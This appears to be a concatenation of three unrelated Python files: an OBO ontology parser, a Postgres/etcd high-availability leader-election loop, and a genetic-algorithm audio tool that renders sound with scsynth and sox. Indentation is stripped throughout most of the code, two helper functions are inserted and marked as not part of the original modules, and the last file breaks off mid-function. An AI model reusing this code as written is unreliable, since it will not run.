# Split on the first unescaped ":"
tag, value = _split_and_strip(tag_value_string, ":")
# Split the value on { to get the modifiers if present
value = value.rstrip()
if value.endswith("}") and not value.endswith(r"\}") and \
_rfind_esc(value, "{") != -1:
value, modifiers = _rsplit_and_strip(value, "{")
# remove closing } and any whitespace
modifiers = modifiers[: -1].rstrip()
return tag, value, modifiers, comment
_quotedstr_re = re.compile(r'"(.*?(?<!\\))"')
class OBOObject(object):
"""
A generic OBO object (e.g. Term, Typedef, Instance, ...).
Example::
>>> term = OBOObject(stanza_type="Term", id="FOO:001", name="bar")
>>> term = OBOObject(
... stanza_type="Term",
... id="FOO:001",
... name="bar",
... def_="Example definition { modifier=frob } ! Comment"
... )
...
An alternative way to specify tags in the constructor::
>>> term = OBOObject(stanza_type="Term", id="FOO:001", name="bar",
... def_=("Example definition",
... [("modifier", "frob")],
... "Comment"))
...
.. note::
Note the use of ``def_`` to define the 'def' tag. This is to
avoid the name clash with the python's ``def`` keyword.
.. seealso:: :class:`Term` :class:`Typedef` :class:`Instance`
"""
Dispatch = {}
def __init__(self, stanza_type="Term", **kwargs):
"""
Initialize from keyword arguments.
"""
self.stanza_type = stanza_type
self.tag_values = []
self.values = {}
sorted_tags = sorted(
six.iteritems(kwargs),
key=lambda key_val: chr(1) if key_val[0] == "id" else key_val[0]
)
for tag, value in sorted_tags:
if isinstance(value, six.string_types):
tag, value, modifiers, comment = \
parse_tag_value(name_demangle(tag) + ": " + value)
elif isinstance(value, tuple):
tag, value, modifiers, comment = \
((name_demangle(tag),) + value + (None, None))[:4]
self.add_tag(tag, value, modifiers, comment)
self.related = set()
@property
def is_annonymous(self):
"""
Is this object anonymous.
"""
value = self.get_values("is_annonymous")
return bool(value)
@property
def id(self):
"""
The id of this object.
"""
value = self.get_values("id")
return value[0] if value else None
@property
def name(self):
"""
Name of this object
"""
value = self.get_values("name")
return value[0] if value else None
@property
def namespace(self):
"""
namespace tag or None if not defined
"""
values = self.get_values("namespace")
assert 0 <= len(values) <= 1
return values[0] if values else None
@property
def alt_id(self):
return self.get_values("alt_id")
@property
def subset(self):
return self.get_values("subset")
@property
def definition(self):
# synonym for def_
return self.def_
@property
def def_(self):
values = self.get_values("def")
assert 0 <= len(values) <= 1
if not values:
return None
definition = values[0]
match = _quotedstr_re.match(definition)
return match.groups()[0]
@property
def comment(self):
values = self.get_values("comment")
assert 0 <= len(values) <= 1
return values[0] if values else None
@property
def synonyms(self):
values = self.get_values("synonym")
syn = []
for v in values:
match = _quotedstr_re.match(v)
syn.append(match.groups()[0])
return syn
def name_mangle(self, tag):
return name_mangle(tag)
def name_demangle(self, tag):
return name_demangle(tag)
def add_tag(self, tag, value, modifiers=None, comment=None):
"""
Add `tag`, `value` pair to the object with optional modifiers and
comment.
Example::
>>> term = OBOObject("Term")
>>> term.add_tag("id", "FOO:002", comment="This is an id")
>>> print(term)
[Term]
id: FOO:002 ! This is an id
"""
tag = intern(tag) # a small speed and memory benefit
self.tag_values.append((tag, value, modifiers, comment))
self.values.setdefault(tag, []).append(value)
def add_tags(self, tag_value_iter):
for tag, value, modifiers, comment in tag_value_iter:
self.tag_values.append((tag, value, modifiers, comment))
self.values.setdefault(tag, []).append(value)
def update(self, other):
"""
Update the term with tag value pairs from `other`
(:class:`OBOObject`). The tag value pairs are appended to the
end except for the `id` tag.
"""
for tag, value, modifiers, comment in other.tag_values:
if tag != "id":
self.add_tag(tag, value, modifiers, comment)
def get_values(self, tag):
try:
return self.values[tag]
except KeyError:
return []
def tag_count(self):
"""
Return the number of tags in this object.
"""
return len(self.tag_values)
def tags(self):
"""
Return an list of all (tag, value, modifiers, comment) tuples.
"""
return list(self.tag_values)
def _format_single_tag(self, index):
"""
Return a formated string representing index-th tag pair value.
Example::
>>> term = OBOObject(
... "Term", id="FOO:001", name="bar",
... def_="Example definition {modifier=frob} ! Comment")
...
>>> term._format_single_tag(0)
'id: FOO:001'
>>> term._format_single_tag(1)
'def: Example definition { modifier=frob } ! Comment'
..
Why by index, and not by tag? Multiple tags are allowed.
"""
tag, value, modifiers, comment = self.tag_values[index]
res = ["%s: %s" % (tag, value)]
if modifiers:
res.append("{ %s }" % modifiers)
if comment:
res.append("! " + comment)
return " ".join(res)
def format_stanza(self):
"""
Return a string stanza representation of this object.
"""
stanza = ["[%s]" % self.stanza_type]
for i in range(self.tag_count()):
stanza.append(self._format_single_tag(i))
return "\n".join(stanza)
@classmethod
def parse_stanza(cls, stanza):
r"""
Parse and return an OBOObject instance from a stanza string.
>>> term = OBOObject.parse_stanza(
... '''[Term]
... id: FOO:001
... name: bar
... ''')
>>> print(term.id, term.name)
FOO:001 bar
"""
lines = stanza.splitlines()
stanza_type = lines[0].strip("[]")
tag_values = [parse_tag_value(line) for line in lines[1:]
if ":" in line]
obo = OBOObject.Dispatch[stanza_type]()
obo.add_tags(tag_values)
return obo
def related_objects(self):
"""
Return a list of tuple pairs where the first element is
relationship (typedef id) and the second object id whom the
relationship applies to.
"""
result = [(type_id, id)
for type_id in ["is_a"] # TODO add other defined Typedef ids
for id in self.values.get(type_id, [])]
result = result + [tuple(r.split(None, 1))
for r in self.values.get("relationship", [])]
return result
def __str__(self):
"""
Return a string representation of the object in OBO format
"""
return self.format_stanza()
def __repr__(self):
return ("{0.__name__}(id={1.id!r}, name={1.name}, ...)"
.format(type(self), self))
def __iter__(self):
"""
Iterates over sub terms
"""
return iter(self.related_objects())
class Term(OBOObject):
"""
A 'Term' object in the ontology.
"""
def __init__(self, *args, **kwargs):
OBOObject.__init__(self, "Term", *args, **kwargs)
@property
def is_obsolete(self):
"""
Is this term obsolete.
"""
value = self.get_values("is_obsolete")
return value[0].lower() == "true" if value else False
class Typedef(OBOObject):
"""
A 'Typedef' object in the ontology.
"""
def __init__(self, *args, **kwargs):
OBOObject.__init__(self, "Typedef", *args, **kwargs)
class Instance(OBOObject):
"""
An 'Instance' object in the ontology
"""
def __init__(self, *args, **kwargs):
OBOObject.__init__(self, "Instance", *args, **kwargs)
OBOObject.Dispatch = {"Term": Term, "Typedef": Typedef, "Instance": Instance}
class OBOParser(object):
r""" A simple parser for .obo files (inspired by xml.dom.pulldom)
>>> from six import StringIO
>>> file = StringIO('''
... header_tag: header_value
... [Term]
... id: FOO:001 { modifier=bar } ! comment
... ''')
>>> parser = OBOParser(file)
>>> for event, value in parser:
... print(event, value)
...
HEADER_TAG ['header_tag', 'header_value']
START_STANZA Term
TAG_VALUE ('id', 'FOO:001', 'modifier=bar', 'comment')
CLOSE_STANZA None
"""
def __init__(self, file):
self.file = file
def parse(self, progress_callback=None):
"""
Parse the file and yield parse events.
.. todo List events and values
"""
data = self.file.read()
header = data[: data.index("\n[")]
body = data[data.index("\n[") + 1:]
for line in header.splitlines():
if line.strip():
yield "HEADER_TAG", line.split(": ", 1)
current = None
# For speed make these functions local
startswith = str.startswith
endswith = str.endswith
parse_tag_value_ = parse_tag_value
for line in body.splitlines():
if startswith(line, "[") and endswith(line, "]"):
yield "START_STANZA", line.strip("[]")
current = line
elif startswith(line, "!"):
yield "COMMENT", line[1:]
elif line:
yield "TAG_VALUE", parse_tag_value_(line)
else: # empty line is the end of a term
yield "CLOSE_STANZA", None
current = None
if current is not None:
yield "CLOSE_STANZA", None
def __iter__(self):
"""
Iterate over parse events (same as parse())
"""
return self.parse()
class OBOOntology(object):
"""
    A class representing an OBO ontology.
:param file-like file:
        An optional file-like object describing the ontology in obo format.
"""
BUILTINS = BUILTIN_OBO_OBJECTS
def __init__(self, file=None):
self.objects = []
self.header_tags = []
self.id2term = {}
self.alt2id = {}
self._resolved_imports = []
self._invalid_cache_flag = False
self._related_to = {}
# First load the built in OBO objects
builtins = StringIO("\n" + "\n\n".join(self.BUILTINS) + "\n")
self.load(builtins)
if file:
self.load(file)
def add_object(self, obj):
"""
Add an :class:`OBOObject` instance to this ontology.
"""
if obj.id in self.id2term:
raise ValueError("OBOObject with id: %s already in "
"the ontology" % obj.id)
self.objects.append(obj)
self.id2term[obj.id] = obj
self._invalid_cache_flag = True
def add_header_tag(self, tag, value):
"""
Add header tag, value pair to this ontology.
"""
self.header_tags.append((tag, value))
def load(self, file, progress_callback=None):
"""
Load terms from a file.
:param file-like file:
A file-like like object describing the ontology in obo format.
:param function progress_callback:
An optional function callback to report on the progress.
"""
if isinstance(file, six.string_types):
if six.PY3:
file = open(file, "r", encoding="utf-8")
else:
file = open(file, "rb")
parser = OBOParser(file)
current = None
tag_values = []
for event, value in parser.parse(progress_callback=progress_callback):
if event == "TAG_VALUE":
tag_values.append(value)
elif event == "START_STANZA":
current = OBOObject.Dispatch[value]()
elif event == "CLOSE_STANZA":
current.add_tags(tag_values)
self.add_object(current)
current = None
tag_values = []
elif event == "HEADER_TAG":
self.add_header_tag(*value)
elif event != "COMMENT":
raise Exception("Parse Error! Unknown parse "
"event {0}".format(event))
imports = [value for tag, value in self.header_tags
if tag == "import"]
if imports:
warnings.warn("Import header tags are not supported")
# while imports:
# url = imports.pop(0)
# if uri not in self._resolved_imports:
# imported = self.parse_file(open(url, "rb"))
# ontology.update(imported)
# self._resolved_imports.append(uri)
def dump(self, file):
# deprecated use write
self.write(file)
def write(self, stream):
"""
Write the contents of the ontology to a `file` in .obo format.
:param file-like file:
A file like object.
"""
if isinstance(stream, six.string_types):
if six.PY3:
stream = open(stream, "w", encoding="utf-8")
else:
stream = open(stream, "wb")
for key, value in self.header_tags:
stream.write(key + ": " + value + "\n")
# Skip the builtins
for obj in self.objects[len(self.BUILTINS):]:
stream.write("\n")
stream.write(obj.format_stanza())
stream.write("\n")
def update(self, other):
"""
Update this ontology with the terms from `other`.
"""
for term in other:
if term.id in self:
if not term.is_annonymous:
self.term(term.id).update(term)
else: # Do nothing
pass
else:
self.add_object(term)
self._invalid_cache_flag = True
def _cache_validate(self, force=False):
"""
Update the relations cache if `self._invalid_cache` flag is set.
"""
if self._invalid_cache_flag or force:
self._cache_relations()
def _cache_relations(self):
"""
Collect all relations from parent to a child and store it in
``self._related_to`` member.
"""
related_to = defaultdict(list)
for obj in self.objects:
for rel_type, id in self.related_terms(obj):
term = self.term(id)
related_to[term].append((rel_type, obj))
self._related_to = related_to
self._invalid_cache_flag = False
def term(self, id):
"""
Return the :class:`OBOObject` associated with this id.
:param str id:
Term id string.
"""
if isinstance(id, six.string_types):
if id in self.id2term:
return self.id2term[id]
elif id in self.alt2id:
return self.id2term[self.alt2id[id]]
else:
raise ValueError("Unknown term id: %r" % id)
elif isinstance(id, OBOObject):
return id
def terms(self):
"""
Return all :class:`Term` instances in the ontology.
"""
return [obj for obj in self.objects if obj.stanza_type == "Term"]
def term_by_name(self, name):
"""
Return the term with name `name`.
"""
terms = [t for t in self.terms() if t.name == name]
if len(terms) != 1:
raise ValueError("Unknown term name: %r" % name)
return terms[0]
def typedefs(self):
"""
Return all :class:`Typedef` instances in the ontology.
"""
return [obj for obj in self.objects if obj.stanza_type == "Typedef"]
def instances(self):
"""
Return all :class:`Instance` instances in the ontology.
"""
return [obj for obj in self.objects if obj.stanza_type == "Instance"]
def root_terms(self):
"""
Return all root terms (terms without any parents).
"""
return [term for term in self.terms() if not self.parent_terms(term)]
def related_terms(self, term):
"""
Return a list of (`rel_type`, `term_id`) tuples where `rel_type` is
relationship type (e.g. 'is_a', 'has_part', ...) and `term_id` is
the id of the term in the relationship.
"""
term = self.term(term) if not isinstance(term, OBOObject) else term
related = [(tag, value)
for tag in ["is_a"] # TODO: add other typedef ids
for value in term.values.get(tag, [])]
relationships = term.values.get("relationship", [])
for rel in relationships:
related.append(tuple(rel.split(None, 1)))
return related
def edge_types(self):
"""
Return a list of all edge types in the ontology.
"""
return [obj.id for obj in self.objects if obj.stanza_type == "Typedef"]
def parent_edges(self, term):
"""
Return a list of (rel_type, parent_term) tuples.
"""
term = self.term(term)
parents = []
for rel_type, parent in self.related_terms(term):
parents.append((rel_type, self.term(parent)))
return parents
def child_edges(self, term):
"""
Return a list of (rel_type, source_term) tuples.
"""
self._cache_validate()
term = self.term(term)
return self._related_to.get(term, [])
def super_terms(self, term):
"""
Return a set of all super terms of `term` up to the most general one.
"""
terms = self.parent_terms(term)
visited = set()
queue = set(terms)
while queue:
term = queue.pop()
visited.add(term)
queue.update(self.parent_terms(term) - visited)
return visited
def sub_terms(self, term):
"""
Return a set of all sub terms for `term`.
"""
terms = self.child_terms(term)
visited = set()
queue = set(terms)
while queue:
term = queue.pop()
visited.add(term)
queue.update(self.child_terms(term) - visited)
return visited
def child_terms(self, term):
"""
Return a set of all child terms for this `term`.
"""
self._cache_validate()
term = self.term(term)
children = []
for rel_type, term in self.child_edges(term):
children.append(term)
return set(children)
def parent_terms(self, term):
"""
Return a set of all parent terms for this `term`.
"""
term = self.term(term)
parents = []
for rel_type, id in self.parent_edges(term):
parents.append(self.term(id))
return set(parents)
def relations(self):
"""
Return a list of all relations in the ontology.
"""
relations = []
for obj in self.objects:
for type_id, id in obj.related:
target_term = self.term(id)
relations.append((obj, type_id, target_term))
return relations
def __len__(self):
"""
Return the number of all objects in the ontology.
"""
return len(self.objects)
def __iter__(self):
"""
Return an iterator over all objects in the ontology.
"""
return iter(self.objects)
def __contains__(self, oboid):
return oboid in self.id2term
def __getitem__(self, oboid):
"""
Get the object by it's id `oboid`
"""
return self.id2term[oboid]
def to_network(self, terms=None):
"""
Return an Orange.network.Network instance constructed from
this ontology.
"""
edge_types = self.edge_types()
terms = self.terms()
from Orange.orng import orngNetwork
import orange
network = orngNetwork.Network(len(terms), True, len(edge_types))
network.objects = dict([(term.id, i) for i, term in enumerate(terms)])
edges = defaultdict(set)
for term in self.terms():
related = self.related_terms(term)
for relType, relTerm in related:
edges[(term.id, relTerm)].add(relType)
edgeitems = edges.items()
for (src, dst), eTypes in edgeitems:
network[src, dst] = [1 if e in eTypes else 0 for e in edge_types]
domain = orange.Domain([orange.StringVariable("id"),
orange.StringVariable("name"),
orange.StringVariable("def"),
], False)
items = orange.ExampleTable(domain)
for term in terms:
ex = orange.Example(domain, [term.id, term.name, term.values.get("def", [""])[0]])
items.append(ex)
relationships = set([", ".join(sorted(eTypes)) for (_, _), eTypes in edgeitems])
domain = orange.Domain([orange.FloatVariable("u"),
orange.FloatVariable("v"),
orange.EnumVariable("relationship", values=list(edge_types))
], False)
id2index = dict([(term.id, i + 1) for i, term in enumerate(terms)])
links = orange.ExampleTable(domain)
for (src, dst), eTypes in edgeitems:
ex = orange.Example(domain, [id2index[src], id2index[dst], eTypes.pop()])
links.append(ex)
network.items = items
network.links = links
network.optimization = None
return network
def to_networkx(self, terms=None):
"""
Return a NetworkX graph of this ontology.
"""
import networkx
graph = networkx.DiGraph()
edge_types = self.edge_types()
edge_colors = {"is_a": "red"}
if terms is None:
terms = self.terms()
else:
terms = [self.term(term) for term in terms]
super_terms = [self.super_terms(term) for term in terms]
terms = reduce(operator.ior, super_terms, set(terms))
for term in terms:
graph.add_node(term.id, name=term.name)
for term in terms:
for rel_type, rel_term in self.related_terms(term):
rel_term = self.term(rel_term)
if rel_term in terms:
graph.add_edge(term.id, rel_term.id, label=rel_type,
color=edge_colors.get(rel_type, "blue"))
return graph
def to_graphviz(self, terms=None):
"""
Return an pygraphviz.AGraph representation of the ontology.
If `terms` is not `None` it must be a list of terms in the ontology.
The graph will in this case contain only the super graph of those
terms.
"""
import pygraphviz as pgv
graph = pgv.AGraph(directed=True, name="ontology")
edge_types = self.edge_types()
edge_colors = {"is_a": "red"}
if terms is None:
terms = self.terms()
else:
terms = [self.term(term) for term in terms]
super_terms = [self.super_terms(term) for term in terms]
terms = reduce(operator.ior, super_terms, set(terms))
for term in terms:
graph.add_node(term.id, label=term.name)
for root in self.root_terms():
node = graph.get_node(root.id)
node.attr["rank"] = "max"
for term in terms:
for rel_type, rel_term in self.related_terms(term):
rel_term = self.term(rel_term)
if rel_term in terms:
graph.add_edge(term.id, rel_term.id, label=rel_type,
color=edge_colors.get(rel_type, "blue"))
return graph
def name_mangle(tag):
"""
Mangle tag name if it conflicts with python keyword.
>>> name_mangle("def"), name_mangle("class")
('def_', 'class_')
"""
if keyword.iskeyword(tag):
return tag + "_"
else:
return tag
def name_demangle(tag):
"""
Reverse of `name_mangle`.
"""
if tag.endswith("_") and keyword.iskeyword(tag[:-1]):
return tag[:-1]
else:
return tag
def load(file):
"""
Load an ontology from a .obo file.
"""
return OBOOntology(file)
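# Hedged usage sketch (not part of the original module): the .obo path below is
# a placeholder assumption; everything else uses only functions defined above
# (load, OBOOntology.__len__, OBOOntology.to_networkx).
def _example_load_and_graph(path="gene_ontology.obo"):
    """
    Load an .obo file and convert it to a directed NetworkX graph, returning
    the number of parsed objects and the number of graph nodes.
    """
    ontology = load(path)
    graph = ontology.to_networkx()
    return len(ontology), graph.number_of_nodes()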
def foundry_ontologies():
"""
Return a list of ontologies available from the OBOFoundry `website
<http://www.obofoundry.org/>`_. The list contains tuples of the form
`(title, url)`, for instance
``('Biological process', 'http://purl.obolibrary.org/obo/go.obo')``
"""
warnings.warn(
"foundry_ontologies is deprecated and most likely returns an "
"empty list",
DeprecationWarning, stacklevel=2
)
stream = urlopen("http://www.obofoundry.org/")
encoding = stream.headers.get_charsets("utf-8")[0]
text = stream.read().decode(encoding)
pattern = r'<td class=".+?">\s*<a href=".+?">(.+?)</a>\s*</td>\s*<td class=".+?">.*?</td>\s*<td class=".+?">.*?</td>\s*?<td class=".+?">\s*<a href="(.+?obo)">.+?</a>'
return re.findall(pattern, text)
if __name__ == "__main__":
import doctest
stanza = '''[Term]
id: FOO:001
name: bar
'''
seinfeld = StringIO("""
[Typedef]
id: parent
[Typedef]
id: child
inverse_of: parent ! not actually used yet
[Term]
id: 001
name: George
[Term]
id: 002
name: Estelle
relationship: parent 001 ! George
[Term]
id: 003
name: Frank
relationship: parent 001 ! George
""") # TODO: fill the ontology with all characters
term = OBOObject.parse_stanza(stanza)
seinfeld = OBOOntology(seinfeld)
print(seinfeld.child_edges("001"))
doctest.testmod(extraglobs={"stanza": stanza, "term": term},
optionflags=doctest.ELLIPSIS)
| gpl-3.0 | 2,057,996,227,598,516,200 | 27.902527 | 170 | 0.544529 | false |
miketonks/governor | helpers/ha.py | 1 | 4532 | import sys, time, re, urllib2, json, psycopg2
import logging
from base64 import b64decode
import helpers.errors
import inspect
logger = logging.getLogger(__name__)
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
class Ha:
def __init__(self, state_handler, etcd):
self.state_handler = state_handler
self.etcd = etcd
def acquire_lock(self):
return self.etcd.attempt_to_acquire_leader(self.state_handler.name)
def update_lock(self):
return self.etcd.update_leader(self.state_handler)
def update_last_leader_operation(self):
return self.etcd.update_last_leader_operation(self.state_handler.last_operation)
def is_unlocked(self):
return self.etcd.leader_unlocked()
def has_lock(self):
return self.etcd.am_i_leader(self.state_handler.name)
def fetch_current_leader(self):
return self.etcd.current_leader()
def run_cycle(self):
try:
if self.state_handler.is_healthy():
if self.is_unlocked():
logging.info("Leader is unlocked - starting election")
if self.state_handler.is_healthiest_node(self.etcd):
if self.acquire_lock():
if not self.state_handler.is_leader():
self.state_handler.promote()
return "promoted self to leader by acquiring session lock"
return "acquired session lock as a leader"
else:
if self.state_handler.is_leader():
self.state_handler.demote(self.fetch_current_leader())
return "demoted self due after trying and failing to obtain lock"
else:
self.state_handler.follow_the_leader(self.fetch_current_leader())
return "following new leader after trying and failing to obtain lock"
else:
if self.state_handler.is_leader():
self.state_handler.demote(self.fetch_current_leader())
return "demoting self because i am not the healthiest node"
elif self.fetch_current_leader() is None:
self.state_handler.follow_no_leader()
return "waiting on leader to be elected because i am not the healthiest node"
else:
self.state_handler.follow_the_leader(self.fetch_current_leader())
return "following a different leader because i am not the healthiest node"
else:
if self.has_lock():
self.update_lock()
if not self.state_handler.is_leader():
self.state_handler.promote()
return "promoted self to leader because i had the session lock"
else:
return "I am the leader with the lock"
else:
logger.debug("does not have lock")
if self.state_handler.is_leader():
self.state_handler.demote(self.fetch_current_leader())
return "demoting self because i do not have the lock and i was a leader"
else:
self.state_handler.follow_the_leader(self.fetch_current_leader())
return "I am a secondary and i am following a leader"
else:
if not self.state_handler.is_running():
self.state_handler.start(master=self.has_lock())
return "postgresql was stopped. starting again."
return "no action. not healthy enough to do anything."
except helpers.errors.CurrentLeaderError:
logger.error("failed to fetch current leader from etcd")
except psycopg2.OperationalError:
logger.error("Error communicating with Postgresql. Will try again.")
except helpers.errors.HealthiestMemberError:
logger.error("failed to determine healthiest member fromt etcd")
def run(self):
while True:
self.run_cycle()
time.sleep(10)
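# Hedged wiring sketch (not part of the original module): the governor normally
# builds Ha from a Postgresql state handler and an Etcd client; the import
# paths, class names and config keys below are assumptions for illustration.
def example_build_and_run(config):
    from helpers.postgresql import Postgresql
    from helpers.etcd import Etcd
    ha = Ha(Postgresql(config["postgresql"]), Etcd(config["etcd"]))
    # a single pass of the leader-election state machine implemented in run_cycle
    return ha.run_cycle()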
| mit | 4,333,031,349,101,279,700 | 43.871287 | 105 | 0.541483 | false |
kitefishlabs/Genomic | genomic5.py | 1 | 16909 | import sc, random, contextlib, wave, os, math
import shlex, subprocess, signal
import NRTOSCParser3
import numpy as np
import scipy.signal
# Generator class for random 8-bit gene values.
#
# Pass initval >= 0 to seed the generator with a fixed starting value;
# otherwise the starting value is drawn uniformly from 0..128.
#
# Call next() (or the instance itself) to draw a fresh random value.
#
class RandomGenerator_8Bit(object):
def __init__(self, initval=-1):
if initval >= 0:
self.val = initval
else:
self.val = random.randint(0,128)
def next(self, scale=1.0):
self.val = random.randint(0,128)
return self.val
def __call__(self): return self.next()
# helper function
def midi2hz(m): return pow(2.0, (m/12.0))
# slot assignments for sigmaSynth
ALPHA = 0
C_DELAY = 1
BETA = 2
D_MULT = 3
GAMMA = 4
MS_BINS = 5
class GenomicExplorer:
def __init__(self, anchor, sfilenames, size=20, kdepth=10): #, start_state=[1.0, 0.0, 1.0, 1.0, 1.0, 0.0]
self.anchor = anchor
self.sfpaths = [(anchor + '/snd/' + sfilename) for sfilename in sfilenames]
self.filenames = sfilenames
self.sfinfos = []
for path in self.sfpaths:
with contextlib.closing(wave.open(path,'r')) as f:
frames = f.getnframes()
rate = f.getframerate()
dur = frames/float(rate)
self.sfinfos += [{'rate':rate,'dur':dur}]
self.mutation_prob = 0.05
#self.xover_prob = 0.05
self.depth = kdepth
# 'alpha', 'c_delay', 'beta', 'd_mult', 'gamma', 'ms_bins'
self.parser = NRTOSCParser3.NRTOSCParser3(anchor=self.anchor)
self.rawtable, self.rawmaps, self.dists = dict(), dict(), dict()
print self.sfpaths
print self.sfinfos
self.init_population(size=size)
def init_population(self, size):
self.population = []
for n in range(size):
#start = [random.randrange(500, 1000)*0.001, random.randrange(0,50)*0.001, random.randrange(500, 1000)*0.001, random.randrange(100,1000)*0.01, random.randrange(500, 1000)*0.001, random.randrange(0,5000)*0.01]
self.population += [Genome()] #random seed
# self.population += [Genome(starter)]
self.population[0] = Genome(values=[0,0,0,0,0,0])
self.analyze_individual(0)
self.activate_raw_data(0)
self.compare_all_individuals(aflag=True)
def mutate_pop(self):
for indiv in range(1, len(self.population)):
if random.random() < self.mutation_prob:
print "indiv: ", indiv
self.population[ indiv ].mutate()
self.do_update_cascade(indiv)
def do_update_cascade(self, index, clearedits=False):
if clearedits is True:
self.population[ index ].edits = 0
else:
self.population[ index ].edits += 1
self.analyze_individual( index )
self.activate_raw_data( index )
self.compare_individual_chi_squared( index )
# self.compare_individual( index )
def mate(self, a, b, kill_index):
# cut = random.randint(0,5)
offspring = None
if random.random() < 0.5:
offspring = self.population[a].values[:]
else:
offspring = self.population[b].values[:]
# basic gene selection from 2 parents
for i in range(6):
if random.random() < 0.5:
offspring[i] = self.population[a].values[i]
else:
offspring[i] = self.population[b].values[i]
self.population[kill_index] = Genome(offspring)
self.do_update_cascade(kill_index, True)
def sort_by_distances(self, depth):
sorted_dists = [[k, self.dists[k], self.population[k].age, self.population[k].edits] for k in sorted(self.dists.keys())]
sorted_dists = sorted(sorted_dists[1:], key = lambda row: row[1]) # + (maxedits - row[3])))
return sorted_dists[:depth], sorted_dists[(-1*depth):]
def reproduce(self, depth=25):
kills, duplicates = self.sort_by_distances(depth)
print 'depth: ', depth
# depth # of times: choose 2 random parents to mate and overwrite replacement in unfit individual's slot
for n in range(depth):
print 'num. duplicates: ', len(duplicates)
aidx = duplicates[ random.randint(0, depth-1) ][0]
bidx = duplicates[ random.randint(0, depth-1) ][0]
kidx = kills[ random.randint(0, depth-1) ][0]
self.mate(aidx, bidx, kidx)
def age_pop(self):
for i in range(len(self.population)): self.population[i].age += 1
def iterate(self, iters=1):
sc.quit()
for iter in range(iters):
self.age_pop()
self.mutate_pop()
# self.crossover()
if (iter%20)==0:
print self.population[0].age
self.reproduce(self.depth)
def print_all_individuals(self):
print '== pop ==========================='
for g in self.population: print g
def start_sc(self):
try:
sc.start(verbose=1, spew=1, startscsynth=1)
except OSError: # in case we've already started the synth
print 'QUIT!'
sc.quit()
print 'sfpaths: ', self.sfpaths
for i, sfpath in enumerate(self.sfpaths):
bnum = sc.loadSnd(sfpath, wait=False)
print 'bnum: ', bnum
self.sfinfos[i]['bnum'] = bnum
return 1
# |outbus=20, srcbufNum, start=0.0, dur=1.0, transp=1.0, c_delay=0.0, c_decay=0.0, d_mult=1.0, d_amp=0.7, ms_bins=0, alpha=1, beta=1, gamma=1|
def play_genome(self, index):
vals = self.population[index].realvalues
if vals[C_DELAY] < 1.0:
cdelay = 0.0
else:
cdelay = vals[C_DELAY]
decay = 0.9
tr = self.population[index].tratio
if index == 0:
slot = 0
else:
slot = 1
print '===================\n', self.sfinfos[slot]['dur']
sc.Synth('sigmaSynth',
args=[
'srcbufNum', self.sfinfos[slot]['bnum'],
'start', 0,
'dur', self.sfinfos[slot]['dur']*1000,
'transp', tr,
'c_delay', cdelay,
'c_decay', decay,
'd_mult', vals[D_MULT],
'ms_bins', vals[MS_BINS],
'alpha', vals[ALPHA],
'beta', vals[BETA],
'gamma', vals[GAMMA]])
def analyze_individual(self, index):
# oscpath = os.path.join(self.anchor, 'snd', 'osc', `index`, (os.path.splitext(self.filename)[0] + '_sigmaAnalyzer.osc'))
# mdpath = os.path.join(self.anchor, 'snd', 'md', `index`, self.filename)
vals = self.population[index].realvalues
if vals[C_DELAY] < 1.0:
cdelay = 0.0
else:
cdelay = vals[C_DELAY]
decay = 0.9
tr = self.population[index].tratio
if index == 0:
slot = 0
else:
slot = 1
oscpath, mdpath = self.parser.createNRTScore(self.sfpaths[slot],
index=index,
tratio=tr,
srate=self.sfinfos[slot]['rate'],
duration=self.sfinfos[slot]['dur'],
params=[
'c_delay', cdelay,
'c_decay', decay,
'd_mult', vals[D_MULT],
'ms_bins', vals[MS_BINS],
'alpha', vals[ALPHA],
'beta', vals[BETA],
'gamma', vals[GAMMA]])
cmd = 'scsynth -N ' + oscpath + ' _ _ 44100 WAVE float32 -o 1'
# print cmd
args = shlex.split(cmd)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #, shell=True, close_fds=True)
# print 'PID: ', p.pid
rc = p.wait()
# print 'RC: ', rc
if rc == 1:
num_frames = int(math.ceil(self.sfinfos[slot]['dur'] / 0.04 / tr))
# print 'num frames: ', num_frames
self.rawtable[index] = (mdpath, num_frames)
# print self.rawtable
def render_individual(self, index):
vals = self.population[index].realvalues
if vals[C_DELAY] < 1.0:
cdelay = 0.0
else:
cdelay = vals[C_DELAY]
decay = 0.9
tr = self.population[index].tratio
if index == 0:
slot = 0
else:
slot = 1
oscpath, mdpath = self.parser.createNRTScore(self.sfpaths[slot],
index=index,
tratio=tr,
srate=self.sfinfos[slot]['rate'],
duration=self.sfinfos[slot]['dur'],
params=[
'c_delay', cdelay,
'c_decay', decay,
'd_mult', vals[D_MULT],
'ms_bins', vals[MS_BINS],
'alpha', vals[ALPHA],
'beta', vals[BETA],
'gamma', vals[GAMMA]])
cmd = 'scsynth -N ' + oscpath + ' _ ' + os.path.join(self.anchor, 'snd', 'out', (str(index) + '.aiff')) + ' 44100 AIFF int16 -o 1'
args = shlex.split(cmd)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #, shell=True, close_fds=True)
rc = p.wait()
if rc == 1:
print 'SUCCESS: ', os.path.join(self.anchor, 'snd', 'out', (str(index) + '.aiff'))
rc = 0
else:
return None
cmd = 'sox -b 16 ' + os.path.join(self.anchor, 'snd', 'out', (str(index) + '.aiff')) + ' ' + os.path.join(self.anchor, 'snd', 'out', (str(index) + '.wav')) # + '; rm ' + os.path.join(self.anchor, 'snd', 'out', (str(index) + '.aiff'))
print cmd
args = shlex.split(cmd)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #, shell=True, close_fds=True)
rc = p.wait()
print rc
if rc == 1: print 'DOUBLE SUCCESS!!'
def activate_raw_data(self, index):
mdpath = self.rawtable[index][0]
num_frames = self.rawtable[index][1]
self.rawmaps[index] = np.memmap(mdpath, dtype=np.float32, mode='r', offset=272, shape=(num_frames, 25))
"""
COMPARE_ALL_INDIVIDUALS:
... to individual in slot 0!
"""
def compare_all_individuals(self, aflag=False):
for i in range(1, len(self.population)):
if aflag:
self.analyze_individual(i)
self.activate_raw_data(i)
# self.compare_individual_chi_squared(i)
self.compare_individual(i)
print self.dists
return self.dists
"""
COMPARE_INDIVIDUAL:
... to individual in the slot that is stipulated by the arg zeroindex!
- by convention, we should usually put what we are comparing to in slot 0
"""
def compare_individual(self, index, zeroindex=0):
i_length = self.rawmaps[index].shape[0]
zr0_length = self.rawmaps[zeroindex].shape[0]
print i_length, ' | ', zr0_length
# i1_length = self.rawmaps[index-1].shape[0] ## <--- NEIGHBOR comparison
